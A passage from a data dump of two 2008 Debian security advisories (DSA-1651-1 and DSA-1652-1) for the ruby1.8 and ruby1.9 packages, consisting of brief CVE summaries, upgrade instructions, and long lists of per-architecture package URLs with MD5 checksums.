http://security.debian.org/pool/updates/main/r/ruby1.8/rdoc1.8_1.8.5-4etch3_all.deb\n Size/MD5 checksum: 310244 e321a815c462f98b404b8c1665d1b55f\n\nalpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch3_alpha.deb\n Size/MD5 checksum: 903552 ad6a8ddd2bf50091f4379509c7b6cef4\n http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch3_alpha.deb\n Size/MD5 checksum: 1869012 1a2090d92784326905495c96fe508bf2\n http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch3_alpha.deb\n Size/MD5 checksum: 198226 b11408bce9fbb392955416fb76d3f6b8\n http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch3_alpha.deb\n Size/MD5 checksum: 199160 e087c534968b3ee42d5c1a8eb271ffb0\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch3_alpha.deb\n Size/MD5 checksum: 1638944 58b67c19df5d4394619792d1b8b40c03\n http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch3_alpha.deb\n Size/MD5 checksum: 199128 5ff5a9ca775487dcd3eb6d1e1d4eb180\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch3_alpha.deb\n Size/MD5 checksum: 219386 d12ee43d6a3f38b98852fedc2349d3d5\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch3_alpha.deb\n Size/MD5 checksum: 1075242 ce403140ff57e22f5260226ff3d9325c\n http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch3_alpha.deb\n Size/MD5 checksum: 301056 98e0e061f488d2b111f032a19d5a1060\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch3_amd64.deb\n Size/MD5 checksum: 1068652 90b93dcde06d9ddcdee05ace2c42bb9e\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch3_amd64.deb\n Size/MD5 checksum: 217282 f7c81dbf89b107a334ecd4bb4da66ba6\n 
http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch3_amd64.deb\n Size/MD5 checksum: 198082 006299a09bf2074c481322dfbce9dfe6\n http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch3_amd64.deb\n Size/MD5 checksum: 302902 6ef6a2d83f8b158b62ea62f3c4bba3fa\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch3_amd64.deb\n Size/MD5 checksum: 1586654 9d7b4530804e8089a08a95c39bdeabbe\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch3_amd64.deb\n Size/MD5 checksum: 748606 c07117a39289e01786fb9ee7a27a1829\n http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch3_amd64.deb\n Size/MD5 checksum: 1864338 a6e21b1b7dca462d5fb45689fe092150\n http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch3_amd64.deb\n Size/MD5 checksum: 197638 f6bb914b21492cf68cb1c4558e4ac644\n http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch3_amd64.deb\n Size/MD5 checksum: 198694 4757a7c9b578208d761fe2ccdce3fa41\n\nhppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch3_hppa.deb\n Size/MD5 checksum: 200220 2d8704ff62159bb1e8c2fc635e9cb3b5\n http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch3_hppa.deb\n Size/MD5 checksum: 199810 4e51aa246f1602dec04095780c0f5170\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch3_hppa.deb\n Size/MD5 checksum: 1677464 394c17e4c1e40082701773314c3310e0\n http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch3_hppa.deb\n Size/MD5 checksum: 1869130 04510cbc8347e4cd055f22b11a26b234\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch3_hppa.deb\n Size/MD5 checksum: 824102 b40a7f34f9401e1461f2211c904d3153\n 
http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch3_hppa.deb\n Size/MD5 checksum: 1042102 f7f16a8ffb6be3a6a874b49be5904da8\n http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch3_hppa.deb\n Size/MD5 checksum: 316154 82f7dcc15c9ef9c542b12830910c72d4\n http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch3_hppa.deb\n Size/MD5 checksum: 199118 6c2239c266c6e7653449780d6ab18f71\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch3_hppa.deb\n Size/MD5 checksum: 219164 2ad50197b6cf436a728c5b615a52a046\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch3_i386.deb\n Size/MD5 checksum: 999668 64201f397337b7478893c08afc261e00\n http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch3_i386.deb\n Size/MD5 checksum: 293708 2327aefddae4e2dd58e9387e36a3934c\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch3_i386.deb\n Size/MD5 checksum: 219408 e3cef11245e5554bef15f5598df21a8f\n http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch3_i386.deb\n Size/MD5 checksum: 197598 56ccc12092d5296e8156c1bc4f411119\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch3_i386.deb\n Size/MD5 checksum: 719716 329bf36bc69b73ac908d6131e12a9933\n http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch3_i386.deb\n Size/MD5 checksum: 198252 e5df4a73eea74976f81949cfc085c722\n http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch3_i386.deb\n Size/MD5 checksum: 1856646 f839ef877cc1d905f20868ac29d8c6d6\n http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch3_i386.deb\n Size/MD5 checksum: 197916 221e994fe9132b0121ae1c1aef4d1a71\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch3_i386.deb\n Size/MD5 
checksum: 1534674 aff183539b7a3ffb37078d263b4c0fc4\n\nia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch3_ia64.deb\n Size/MD5 checksum: 201426 7700f382729ccb1bf36b7361eda4e1e6\n http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch3_ia64.deb\n Size/MD5 checksum: 330536 de290038777d785a40b96ecde67bcb79\n http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch3_ia64.deb\n Size/MD5 checksum: 202400 425437ebd7a25ddcc24f0b00643e0e15\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch3_ia64.deb\n Size/MD5 checksum: 971614 157129fd20a8e99bb060eb16d04b9b1e\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch3_ia64.deb\n Size/MD5 checksum: 1895636 42981c9c01f3bfe0c29d9c89c67456ea\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch3_ia64.deb\n Size/MD5 checksum: 218566 73418bc1a694edf6666a3bef64ab66b8\n http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch3_ia64.deb\n Size/MD5 checksum: 1861876 81df0b92b58078d1414bca3298a801fd\n http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch3_ia64.deb\n Size/MD5 checksum: 203346 861ceb05ebf6549fa2872f2f24eafdbd\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch3_ia64.deb\n Size/MD5 checksum: 1026222 1c6b059f43c36a3d2195fb071a21c0c0\n\nmips architecture (MIPS (Big Endian))\n\n http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch3_mips.deb\n Size/MD5 checksum: 196588 0b12b7621be85e03e3ccf9bb8bf18252\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch3_mips.deb\n Size/MD5 checksum: 802442 2a8e096b0bdec5cf68ca800bab083058\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch3_mips.deb\n Size/MD5 checksum: 217920 f7ad5607292040314c621508996c10e3\n 
http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch3_mips.deb\n Size/MD5 checksum: 197376 ceef5241e870f21a04406000cfe861f7\n http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch3_mips.deb\n Size/MD5 checksum: 281460 585fe80dfa9e975314e6df5ec9f35490\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch3_mips.deb\n Size/MD5 checksum: 1085282 94a0aa16383ec7f2ab88d742cead73c2\n http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch3_mips.deb\n Size/MD5 checksum: 1850952 26828e1d9dc0b6d24cfc9a8f5ea1bb33\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch3_mips.deb\n Size/MD5 checksum: 1540352 a1c65ec2cd909491de849c9907d2eabc\n http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch3_mips.deb\n Size/MD5 checksum: 197514 118cfb3032dd4b79691ba0f79341bcc4\n\nmipsel architecture (MIPS (Little Endian))\n\n http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch3_mipsel.deb\n Size/MD5 checksum: 197666 42073374de4e32b274d2a485896d0734\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch3_mipsel.deb\n Size/MD5 checksum: 1060018 eb935e3e4592e2ac723b87227258526a\n http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch3_mipsel.deb\n Size/MD5 checksum: 279206 21f76e4afe491f2ceaaa90215e2e6dab\n http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch3_mipsel.deb\n Size/MD5 checksum: 198014 6ec3efd9b594a9cc2759d95b61f2a64a\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch3_mipsel.deb\n Size/MD5 checksum: 1538558 725d0012a98297cc4ae2c2aa6d76e73f\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch3_mipsel.deb\n Size/MD5 checksum: 218098 a75856178c8addc09ae0db8dd8349b88\n 
http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch3_mipsel.deb\n Size/MD5 checksum: 793332 fff033a8fde91eeaa458f2be3252a7bf\n http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch3_mipsel.deb\n Size/MD5 checksum: 1830324 a816a6d7bb2059cead4d5be647e66c03\n http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch3_mipsel.deb\n Size/MD5 checksum: 197072 cc83f3923ec214e99dfb87552813e524\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch3_powerpc.deb\n Size/MD5 checksum: 219368 5033aca578c0a97d044b136adf2120d2\n http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch3_powerpc.deb\n Size/MD5 checksum: 293966 13f4c179f750c4ef69229f5f8c714908\n http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch3_powerpc.deb\n Size/MD5 checksum: 199990 900f11656f1bbfb7143c96eb6eca55b2\n http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch3_powerpc.deb\n Size/MD5 checksum: 199672 b36fcd86eae4a996aceea9f51ed82b6f\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch3_powerpc.deb\n Size/MD5 checksum: 1592660 53543d9b925d742e2dd0bb21842d9484\n http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch3_powerpc.deb\n Size/MD5 checksum: 199450 7eecb4e14d914ef9ce18297dafeb4beb\n http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch3_powerpc.deb\n Size/MD5 checksum: 1837328 fc2549416dba4e379f56755dc11cf3d5\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch3_powerpc.deb\n Size/MD5 checksum: 1108684 93123428d72447a94854d3ffa7feba05\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch3_powerpc.deb\n Size/MD5 checksum: 718932 c59ae18feb43ed2dca6300adabb1a9e4\n\ns390 architecture (IBM S/390)\n\n 
http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch3_s390.deb\n Size/MD5 checksum: 305246 14e3e5cddc2398095a39f5e7db03d50d\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch3_s390.deb\n Size/MD5 checksum: 779454 22db8f14e5f3524693854a896d25dc73\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch3_s390.deb\n Size/MD5 checksum: 1620164 25eb518ccfa74c490cd894a96d464743\n http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch3_s390.deb\n Size/MD5 checksum: 199400 7f87e9c92d21d9f0cc27168c15b09e90\n http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch3_s390.deb\n Size/MD5 checksum: 198604 f9b34b538bd4fae60bf1cfd357d78977\n http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch3_s390.deb\n Size/MD5 checksum: 198918 8e6b256da2d93404909bffaf9741cb8a\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch3_s390.deb\n Size/MD5 checksum: 217956 e0603b2614b4402e24763265af2a69aa\n http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch3_s390.deb\n Size/MD5 checksum: 1838970 5eb6c09970d3a051d6fe1753893c7222\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch3_s390.deb\n Size/MD5 checksum: 1051972 d10d44795254610d6f4becff47d5c3a7\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch3_sparc.deb\n Size/MD5 checksum: 961570 c65f0632dc01bc50d209487741fc41f4\n http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch3_sparc.deb\n Size/MD5 checksum: 1833402 426ef4a80f6c366231813b596c9bf46f\n http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch3_sparc.deb\n Size/MD5 checksum: 197920 006e1097f7fdc7ac9a8b89413a56f2fe\n 
http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch3_sparc.deb\n Size/MD5 checksum: 1543240 4c4c3f00fd078b2fa6778a3245569e87\n http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch3_sparc.deb\n Size/MD5 checksum: 197144 2cd715ed20b9c63c0c264adb6ed1c000\n http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch3_sparc.deb\n Size/MD5 checksum: 197866 71c08be787f0a4f683b91fc539ade3c3\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch3_sparc.deb\n Size/MD5 checksum: 741182 9c970b4ccbba6cba80d8284218d33ef4\n http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch3_sparc.deb\n Size/MD5 checksum: 296052 9567adab606aecadbee3006a572f0965\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch3_sparc.deb\n Size/MD5 checksum: 217898 b375854870d898692db953c88bf80e53\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "modified": "2008-10-12T09:37:30", "published": "2008-10-12T09:37:30", "id": "DEBIAN:DSA-1651-1:0FC77", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2008/msg00243.html", "title": "[SECURITY] [DSA 1651-1] New ruby1.8 packages fix several vulnerabilities", "type": "debian", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-30T02:21:20", "bulletinFamily": "unix", "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-1652-1 
security@debian.org\nhttp://www.debian.org/security/ Moritz Muehlenhoff\nOctober 12, 2008 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : ruby1.9\nVulnerability : several\nProblem-Type : local(remote)\nDebian-specific: no\nCVE ID : CVE-2008-3655 CVE-2008-3656 CVE-2008-3657 CVE-2008-3790 CVE-2008-3905\n\nSeveral vulnerabilities have been discovered in the interpreter for\nthe Ruby language, which may lead to denial of service and other\nsecurity problems. The Common Vulnerabilities and Exposures project\nidentifies the following problems:\n\nCVE-2008-3655\n\n Keita Yamaguchi discovered that several safe level restrictions\n are insufficiently enforced.\n \nCVE-2008-3656\n\n Christian Neukirchen discovered that the WEBrick module uses\n inefficient algorithms for HTTP header splitting, resulting in\n denial of service through resource exhaustion.\n\nCVE-2008-3657\n\n It was discovered that the dl module doesn't perform taint\n checks.\n\nCVE-2008-3790\n\n Luka Treiber and Mitja Kolsek discovered that recursively nested\n XML entities can lead to denial of service through resource\n exhaustion in rexml.\n\nCVE-2008-3905\n\n Tanaka Akira discovered that the resolv module uses sequential\n transaction IDs and a fixed source port for DNS queries, which\n makes it more vulnerable to DNS spoofing attacks.\n\nFor the stable distribution (etch), these problems have been fixed in\nversion 1.9.0+20060609-1etch3. 
Packages for arm will be provided later.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 1.9.0.2-6.\n\nWe recommend that you upgrade your ruby1.9 packages.\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 4.0 alias etch\n- -------------------------------\n\nStable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609.orig.tar.gz\n Size/MD5 checksum: 4450198 483d9b46a973c7e14f7586f0b1129891\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch3.diff.gz\n Size/MD5 checksum: 32500 f9ecc42746b8a277f0adf684db941813\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch3.dsc\n Size/MD5 checksum: 1102 d9f8325a51dc85e7a592135602aa5adb\n\nArchitecture independent packages:\n\n http://security.debian.org/pool/updates/main/r/ruby1.9/rdoc1.9_1.9.0+20060609-1etch3_all.deb\n Size/MD5 checksum: 318568 8829c7b1dc51b1694ec44c22df0b9aa2\n http://security.debian.org/pool/updates/main/r/ruby1.9/irb1.9_1.9.0+20060609-1etch3_all.deb\n Size/MD5 checksum: 255728 98a8ba887948dad97e365d6fe4cd7365\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-examples_1.9.0+20060609-1etch3_all.deb\n Size/MD5 checksum: 265788 baf95223f575afea5a19eda8931ab20f\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-elisp_1.9.0+20060609-1etch3_all.deb\n Size/MD5 checksum: 229404 5fd60bd0423a2bf3e7b7d9f2fdbf50f8\n 
http://security.debian.org/pool/updates/main/r/ruby1.9/ri1.9_1.9.0+20060609-1etch3_all.deb\n Size/MD5 checksum: 694282 195e55b70aaf9f35ff0b3156460c05a0\n\nalpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/r/ruby1.9/libdbm-ruby1.9_1.9.0+20060609-1etch3_alpha.deb\n Size/MD5 checksum: 217526 18e248f393c0157029127735d35ab58c\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch3_alpha.deb\n Size/MD5 checksum: 237710 40f6ac2464dd488bcec0d9e705457071\n http://security.debian.org/pool/updates/main/r/ruby1.9/libopenssl-ruby1.9_1.9.0+20060609-1etch3_alpha.deb\n Size/MD5 checksum: 324622 3daf8b07570c96d9575c851ab21deae3\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9-dbg_1.9.0+20060609-1etch3_alpha.deb\n Size/MD5 checksum: 340188 8e9d2e6f51f659ad6df94a11961b6429\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9_1.9.0+20060609-1etch3_alpha.deb\n Size/MD5 checksum: 1890052 15fa703f9493159f200bc8719305f8f7\n http://security.debian.org/pool/updates/main/r/ruby1.9/libgdbm-ruby1.9_1.9.0+20060609-1etch3_alpha.deb\n Size/MD5 checksum: 216796 19318b591b6bce163cd767ccbc8e55a0\n http://security.debian.org/pool/updates/main/r/ruby1.9/libtcltk-ruby1.9_1.9.0+20060609-1etch3_alpha.deb\n Size/MD5 checksum: 1881332 5b980e23f25edf7bbc978bbdfb2ffa18\n http://security.debian.org/pool/updates/main/r/ruby1.9/libreadline-ruby1.9_1.9.0+20060609-1etch3_alpha.deb\n Size/MD5 checksum: 217544 96ac4e52a0ddbf2a70ae8a49b8468338\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-dev_1.9.0+20060609-1etch3_alpha.deb\n Size/MD5 checksum: 961014 16b8cfc9ec220aed8a4a6d83b7a903f3\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/r/ruby1.9/libreadline-ruby1.9_1.9.0+20060609-1etch3_amd64.deb\n Size/MD5 checksum: 216496 a612ba557549caf4ba25abe252da8568\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9-dbg_1.9.0+20060609-1etch3_amd64.deb\n 
Size/MD5 checksum: 346006 8ea61f15325461d26752621150af4c55\n http://security.debian.org/pool/updates/main/r/ruby1.9/libtcltk-ruby1.9_1.9.0+20060609-1etch3_amd64.deb\n Size/MD5 checksum: 1878306 97b41d5d6a9d13ceab9139faf6ec9f36\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch3_amd64.deb\n Size/MD5 checksum: 235552 8767d4d810273a9f0177a47a0a08c073\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9_1.9.0+20060609-1etch3_amd64.deb\n Size/MD5 checksum: 1850520 0750131f3c14ce426f121099858f02f0\n http://security.debian.org/pool/updates/main/r/ruby1.9/libdbm-ruby1.9_1.9.0+20060609-1etch3_amd64.deb\n Size/MD5 checksum: 216560 5eb826cce7459050017b7085685e996c\n http://security.debian.org/pool/updates/main/r/ruby1.9/libgdbm-ruby1.9_1.9.0+20060609-1etch3_amd64.deb\n Size/MD5 checksum: 216012 d89ffb0add351472565804edf8dac758\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-dev_1.9.0+20060609-1etch3_amd64.deb\n Size/MD5 checksum: 807498 f23ac4d1e46337667e6869d896a2c86a\n http://security.debian.org/pool/updates/main/r/ruby1.9/libopenssl-ruby1.9_1.9.0+20060609-1etch3_amd64.deb\n Size/MD5 checksum: 323396 fd36007f61327bb9e05127cd35e6a2d6\n\nhppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-dev_1.9.0+20060609-1etch3_hppa.deb\n Size/MD5 checksum: 888820 f2a52e9d4019c7c6e36df9a557bb2162\n http://security.debian.org/pool/updates/main/r/ruby1.9/libdbm-ruby1.9_1.9.0+20060609-1etch3_hppa.deb\n Size/MD5 checksum: 217900 86d51cf0dc80bdbd9d25a39b17eee678\n http://security.debian.org/pool/updates/main/r/ruby1.9/libgdbm-ruby1.9_1.9.0+20060609-1etch3_hppa.deb\n Size/MD5 checksum: 217536 3ee4c34f85a0dd8b4f8a328a5e8fbc00\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9_1.9.0+20060609-1etch3_hppa.deb\n Size/MD5 checksum: 1861420 68df4ad96fd1065b76bf391d753ad79e\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch3_hppa.deb\n 
Size/MD5 checksum: 236956 e465433f9cb8186a8326455d59910cc2\n http://security.debian.org/pool/updates/main/r/ruby1.9/libtcltk-ruby1.9_1.9.0+20060609-1etch3_hppa.deb\n Size/MD5 checksum: 1880706 d811527595c9c70569d60581b0b540ea\n http://security.debian.org/pool/updates/main/r/ruby1.9/libreadline-ruby1.9_1.9.0+20060609-1etch3_hppa.deb\n Size/MD5 checksum: 218086 0fc503ce1be877ddcf1ed5110ebc35f5\n http://security.debian.org/pool/updates/main/r/ruby1.9/libopenssl-ruby1.9_1.9.0+20060609-1etch3_hppa.deb\n Size/MD5 checksum: 333712 e26dd25bc69b683518214ffda7aa18fc\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9-dbg_1.9.0+20060609-1etch3_hppa.deb\n Size/MD5 checksum: 395486 d89dec7193f96ac9ea999af10815b0e4\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/r/ruby1.9/libopenssl-ruby1.9_1.9.0+20060609-1etch3_i386.deb\n Size/MD5 checksum: 309582 1e3e3abbe9099df9839f022207104e4c\n http://security.debian.org/pool/updates/main/r/ruby1.9/libdbm-ruby1.9_1.9.0+20060609-1etch3_i386.deb\n Size/MD5 checksum: 216578 6c8c40b3bac4b3008ca37c11d1c15b71\n http://security.debian.org/pool/updates/main/r/ruby1.9/libreadline-ruby1.9_1.9.0+20060609-1etch3_i386.deb\n Size/MD5 checksum: 216352 7ad6c7c069d6922eadc2d51919f42346\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9_1.9.0+20060609-1etch3_i386.deb\n Size/MD5 checksum: 1752688 4c1a4ec5f90608f16b719070239f2dc8\n http://security.debian.org/pool/updates/main/r/ruby1.9/libtcltk-ruby1.9_1.9.0+20060609-1etch3_i386.deb\n Size/MD5 checksum: 1867752 749baa15c5cdd78016acc2e4a4836f80\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch3_i386.deb\n Size/MD5 checksum: 237500 068288ec56066aad6cd3c0148fa9e6b1\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9-dbg_1.9.0+20060609-1etch3_i386.deb\n Size/MD5 checksum: 345708 f01d2d77673b54570e3afcf06afb7bb4\n 
http://security.debian.org/pool/updates/main/r/ruby1.9/libgdbm-ruby1.9_1.9.0+20060609-1etch3_i386.deb\n Size/MD5 checksum: 215600 47671e30dd1a142519c40c1efc6559b9\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-dev_1.9.0+20060609-1etch3_i386.deb\n Size/MD5 checksum: 757964 c34682888461aa146d404c9dccb9f987\n\nia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9_1.9.0+20060609-1etch3_ia64.deb\n Size/MD5 checksum: 2225874 c1f834cdd95279bbf5eca576c3511088\n http://security.debian.org/pool/updates/main/r/ruby1.9/libgdbm-ruby1.9_1.9.0+20060609-1etch3_ia64.deb\n Size/MD5 checksum: 220606 3c65aba37358087e1e26a16677e474f8\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-dev_1.9.0+20060609-1etch3_ia64.deb\n Size/MD5 checksum: 1095774 6d57aff7a609eb69ea57dfeb60b9d831\n http://security.debian.org/pool/updates/main/r/ruby1.9/libreadline-ruby1.9_1.9.0+20060609-1etch3_ia64.deb\n Size/MD5 checksum: 220140 